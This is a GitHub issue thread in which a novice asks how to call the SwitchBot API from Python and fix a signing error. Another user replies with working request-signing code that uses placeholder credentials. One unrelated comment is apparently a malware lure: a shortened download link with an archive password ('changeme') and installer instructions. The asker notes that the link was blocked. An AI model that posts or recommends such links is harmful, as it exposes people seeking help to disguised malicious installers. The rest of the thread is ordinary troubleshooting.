### ISSUE TITLE
nOOb here; how do i call this; what is this error

### ISSUE THREAD

**Issue by milty456** [OpenWonderLabs/SwitchBotAPI#340]
### Current Situation

If i take the python script, add my secret and token...then call the py script in my linux comand line with GET https://api.switch-bot.com/v1.1/devices   Is that how i use python?  When I do this I get an error;   File "Sbot-Cpap.py", line 19, in <module>
    string_to_sign = bytes(string_to_sign, 'utf-8')
TypeError: str() takes at most 1 argument (2 given)

Any assistance on this?  Thanks!

### Logs

```markdown
File "Sbot-Cpap.py", line 19, in <module>
    string_to_sign = bytes(string_to_sign, 'utf-8')
TypeError: str() takes at most 1 argument (2 given)
```

### Configuration

```json
Operating System: Ubuntu 20.04.1 LTS
            Kernel: Linux 5.4.65-1-pve
python 3.8
```

### Environment

- OS:
- Software:
- Node:
- npm:

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by milty456** [comment]
Thank link was blocked by bitly

**Comment by milty456** [comment]
Better question, sytax for using the apiheader with the GET request>  full example if possible>

**Comment by milty456** [comment]
Simply put, how do i turn on my bot with python 3

{'message': "Authorization header requires 'Credential' parameter. Authorization header requires 'Signature' parameter. Authorization header requires 'SignedHeaders' parameter. Authorization header requires existence of either a 'X-Amz-Date' or a 'Date' header. Authorization=ttttttttttt............."}



import json
import time
import hashlib
import hmac
import base64
import uuid
import requests
#import responses

# Declare empty header dictionary
apiHeader = {}
# open token
token = 'ttttt' # copy and paste from the SwitchBot app V6.14 or later
# secret key
secret = 'sssss' # copy and paste from the SwitchBot app V6.14 or later
nonce = uuid.uuid4()

t = int(round(time.time() * 1000))
string_to_sign = '{}{}{}'.format(token, t, nonce)

string_to_sign = bytes(string_to_sign, 'utf-8')
secret = bytes(secret, 'utf-8')

sign = base64.b64encode(hmac.new(secret, msg=string_to_sign, digestmod=hashlib.sha256).digest())
print ('Authorization: {}'.format(token))
print ('t: {}'.format(t))
print ('sign: {}'.format(str(sign, 'utf-8')))
print ('nonce: {}'.format(nonce))

#Build api header JSON
apiHeader['Authorization']=token
apiHeader['Content-Type']='application/json'
apiHeader['charset']='utf8'
apiHeader['t']=str(t)
apiHeader['sign']=str(sign, 'utf-8')
apiHeader['nonce']=str(nonce)

url="https://api.switch-bot.com/v1.1/devices/ddddd/commands/press"
response = requests.get(url, headers=apiHeader)
print(response.status_code)
print(response.json())

**Comment by hsakoh** [comment]
```python
import json
import time
import hashlib
import hmac
import base64
import uuid
import requests

apiHeader = {}

token = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
secret = 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy'

nonce = uuid.uuid4()
t = int(round(time.time() * 1000))
string_to_sign = '{}{}{}'.format(token, t, nonce)

string_to_sign = bytes(string_to_sign, 'utf-8')
secret = bytes(secret, 'utf-8')

sign = base64.b64encode(hmac.new(secret, msg=string_to_sign, digestmod=hashlib.sha256).digest())
print ('Authorization: {}'.format(token))
print ('t: {}'.format(t))
print ('sign: {}'.format(str(sign, 'utf-8')))
print ('nonce: {}'.format(nonce))

apiHeader['Authorization']=token
apiHeader['Content-Type']='application/json'
apiHeader['charset']='utf8'
apiHeader['t']=str(t)
apiHeader['sign']=str(sign, 'utf-8')
apiHeader['nonce']=str(nonce)

deviceId = 'zzzzzzzzzzzz'
url = f'https://api.switch-bot.com/v1.1/devices/{deviceId}/commands'

response = requests.post(
    url
    , data=json.dumps({
        "commandType":"command",
        "command":"press",
        "parameter":"default"
    }),headers=apiHeader)

print(response.status_code)
print(response.json())
```

**Comment by milty456** [comment]
Oh, you my friend are my hero!  TY!
